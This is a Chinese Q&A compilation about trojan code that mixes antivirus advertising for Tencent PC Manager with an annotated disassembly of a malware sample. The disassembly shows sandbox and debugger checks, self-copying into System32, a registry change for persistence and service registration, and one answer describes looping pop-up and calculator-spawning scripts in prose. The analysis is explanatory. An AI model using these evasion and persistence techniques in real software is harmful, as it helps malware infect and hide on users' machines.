木马病毒的可执行代码(简单木马病毒代码)
本文目录一览:
木马trojan.generic
您好
从名称上看,应该是类似冲击波病毒的变种
您可以重启电脑按F8进入带网络连接的安全模式
然后使用电脑管家——杀毒——全盘查杀即可
电脑管家拥有基于CPU虚拟执行技术,可以帮您彻底将病毒根除,解决电脑中毒难题
如果还有其他疑问和问题,欢迎再次来电脑管家企业平台进行提问,我们将尽全力为您解答疑难
腾讯电脑管家企业平台:
木马是怎样的病毒?
木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。木马病毒是计算机黑客用于远程控制计算机的程序,将控制程序寄生于被控制的计算机系统中,里应外合,对被感染木马病毒的计算机实施操作。一般的木马病毒程序主要是寻找计算机后门,伺机窃取被控计算机中的密码和重要文件等。可以对被控计算机实施监控、资料修改等非法操作。木马病毒具有很强的隐蔽性。
exe病毒的代码是什么?
刚刚看到一个朋友发了一个ff.exe的病毒样本,简单分析了下,第一部分,主函数代码
004061D2 /$ 55 push ebp ; Main
004061D3 |. 8BEC mov ebp, esp
004061D5 |. 81EC 1C030000 sub esp, 31C
004061DB |. 56 push esi
004061DC |. E8 FCAEFFFF call 取当前计算机用户名
004061E1 |. E8 88AFFFFF call 检查沙箱 ; 看自己是不是在虚拟机或沙箱中运行
004061E6 |. 85C0 test eax, eax
004061E8 |. 0F85 2E010000 jnz 0040631C
004061EE |. E8 C3B1FFFF call 检查模块dbghelp.dll ; 检查自己是否被调试
004061F3 |. 84C0 test al, al
004061F5 |. 0F85 21010000 jnz 0040631C
004061FB |. FF15 B8304100 call dword ptr [kernel32.GetCurrentProc; [GetCurrentProcess
00406201 |. 8BF0 mov esi, eax
00406203 |. 56 push esi
00406204 |. E8 DDAFFFFF call 004011E6 ; 调用NativeAPI查询系统信息
00406209 |. 3C 01 cmp al, 1
0040620B |. 59 pop ecx
0040620C |. 75 08 jnz short 00406216
0040620E |. 6A 00 push 0 ; /ExitCode = 0
00406210 |. FF15 FC304100 call dword ptr [kernel32.ExitProcess] ; \ExitProcess
00406216 | 56 push esi ; /hObject
00406217 |. FF15 CC304100 call dword ptr [kernel32.CloseHandle] ; \CloseHandle
0040621D |. E8 63B1FFFF call 00401385 ; 反调试代码
00406222 |. 3C 01 cmp al, 1
00406224 |. 75 08 jnz short 0040622E
00406226 |. 6A 00 push 0 ; /ExitCode = 0
00406228 |. FF15 FC304100 call dword ptr [kernel32.ExitProcess] ; \ExitProcess
0040622E | E8 42140000 call GetAddress ; 动态获取大量API函数地址
00406233 |. 833D 98584100 00 cmp dword ptr [415898], 0
0040623A |. 74 05 je short 00406241
0040623C |. E8 2F360000 call 00409870 ; 调用大量批处理来执行dos命令
00406241 | 8365 F8 00 and dword ptr [ebp-8], 0
00406245 |. 8365 FC 00 and dword ptr [ebp-4], 0
00406249 |. 6A 02 push 2
0040624B |. C745 F0 34594100 mov dword ptr [ebp-10], 00415934 ; ASCII "lncmmmser"
00406252 |. C745 F4 46934000 mov dword ptr [ebp-C], 00409346
00406259 |. FF15 74AA4100 call dword ptr [41AA74] ; kernel32.SetErrorMode
0040625F |. BE 04010000 mov esi, 104
00406264 |. 8D85 E4FCFFFF lea eax, dword ptr [ebp-31C]
0040626A |. 56 push esi ; /BufSize = 104 (260.)
0040626B |. 50 push eax ; |PathBuffer
0040626C |. 6A 00 push 0 ; |/pModule = NULL
0040626E |. FF15 F4304100 call dword ptr [kernel32.GetModuleHandl; |\GetModuleHandleA
00406274 |. 50 push eax ; |hModule
00406275 |. FF15 F8304100 call dword ptr [kernel32.GetModuleFileN; \GetModuleFileNameA
0040627B |. 8D85 ECFEFFFF lea eax, dword ptr [ebp-114]
00406281 |. 56 push esi ; /DestSizeMax = 104 (260.)
00406282 |. 50 push eax ; |DestString
00406283 |. 68 0C594100 push 0041590C ; |SrcString = "%windir%\system"
00406288 |. FF15 BC304100 call dword ptr [kernel32.ExpandEnvironm; \ExpandEnvironmentStringsA
0040628E |. BE 1C594100 mov esi, 0041591C ; ASCII "serivcers.exe"
00406293 |. 8D85 ECFEFFFF lea eax, dword ptr [ebp-114]
00406299 |. 56 push esi ; /%s = "serivcers.exe"
0040629A |. 50 push eax ; |%s
0040629B |. 8D85 E8FDFFFF lea eax, dword ptr [ebp-218] ; |
004062A1 |. 68 40624100 push 00416240 ; |format = "%s\%s"
004062A6 |. 50 push eax ; |s
004062A7 |. FF15 94314100 call dword ptr [msvcrt.sprintf] ; \sprintf
004062AD |. 8D85 ECFEFFFF lea eax, dword ptr [ebp-114]
004062B3 |. 56 push esi
004062B4 |. 50 push eax
004062B5 |. E8 7D3C0000 call CopySelfToSystem32 ; 复制自身到System32目录,并且替换Serivcers.exe
004062BA |. 83C4 18 add esp, 18
004062BD |. 85C0 test eax, eax
004062BF |. 74 35 je short 004062F6
004062C1 |. 8D85 E4FCFFFF lea eax, dword ptr [ebp-31C]
004062C7 |. 6A 01 push 1
004062C9 |. 50 push eax
004062CA |. 68 CB5C4100 push 00415CCB ; ASCII "systemxstuff"
004062CF |. 68 CC5B4100 push 00415BCC ; ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions"
004062D4 |. FF35 C85B4100 push dword ptr [415BC8]
004062DA |. E8 7A2E0000 call 00409159 ; 修改关键注册表项,关联病毒为explorer打开文件夹
004062DF |. 8D85 E8FDFFFF lea eax, dword ptr [ebp-218]
004062E5 |. 50 push eax
004062E6 |. E8 F8300000 call 注册系统服务
004062EB |. 83C4 18 add esp, 18
004062EE |. 6A 01 push 1 ; /ExitCode = 1
004062F0 |. FF15 FC304100 call dword ptr [kernel32.ExitProcess] ; \ExitProcess
004062F6 | 68 24624100 push 00416224 ; ASCII "Enabled:Microsoft Enabled"
004062FB |. E8 00ADFFFF call 00401000
00406300 |. 59 pop ecx
00406301 |. 8D45 F0 lea eax, dword ptr [ebp-10]
00406304 |. 50 push eax
00406305 |. FF15 8CAA4100 call dword ptr [41AA8C] ; advapi32.StartServiceCtrlDispatcherA
0040630B |. 85C0 test eax, eax
0040630D |. 75 0D jnz short 0040631C
0040630F |. 8D85 E8FDFFFF lea eax, dword ptr [ebp-218]
00406315 |. 50 push eax
00406316 |. E8 C8300000 call 注册系统服务
0040631B |. 59 pop ecx
0040631C | 33C0 xor eax, eax
0040631E |. 5E pop esi
0040631F |. C9 leave
00406320 \. C2 1000 retn 10
木马病毒的可执行代码是怎么样的
你这个问题有点高深了,对于我这种没研究过病毒的人,似乎没办法完整的回答你的问题.但是一些皮毛我还是能给你讲一些的,不一定全对,仅供参考.
代码的话,我没怎么研究过,我知道一种就是把代码写入网站中,让你电脑打开这个网站去进行跳转,或者进行下载他指定的程序.导致你电脑中毒.还有一种你所谓的图片,是用捆绑工具,它不但可以捆绑图片,MP3.EXE等格式的都可以进行捆绑!
腾讯电脑管家依托小红伞(antivir)国际顶级杀毒引擎、腾讯云引擎,鹰眼引擎等四核专业引擎查杀能力,病毒识别率提高30%,深度根除顽固病毒!全方位保障用户上网安全.
我现在用电脑管家好久了,电脑一直很正常,没出现过什么大碍.楼主抓紧试试吧.效果相当好!
希望能够帮到你~
谁能解释下面简单的电脑病毒代码?
我帮你"翻译"一下代码的意思。
这是一段vbs代码:直到(除非)1等于2,否则就一直弹出一个写有"烦死你"的窗口,因为1永远不等于2,所以不断的弹窗。
这是VB的一个简单编程,但是代码却不怀好意。这段代码的意思是说,当双击运行这个程序的时候,执行以下代码:直到(除非)1等于2,否则隐藏这个软件的窗体,然后显示这个软件的窗体,然后调用系统的"calc.exe"程序,也就是调用系统自带的"计算器",因为1永远不等于2,所以这些步骤永远循环的执行下去。以现在的计算机来看,并不会"运行后马上死机",我们的计算机还不至于这么差劲,不过cpu会高涨,根据不同计算机的配置,时间范围从很快死机到数秒后死机不等。
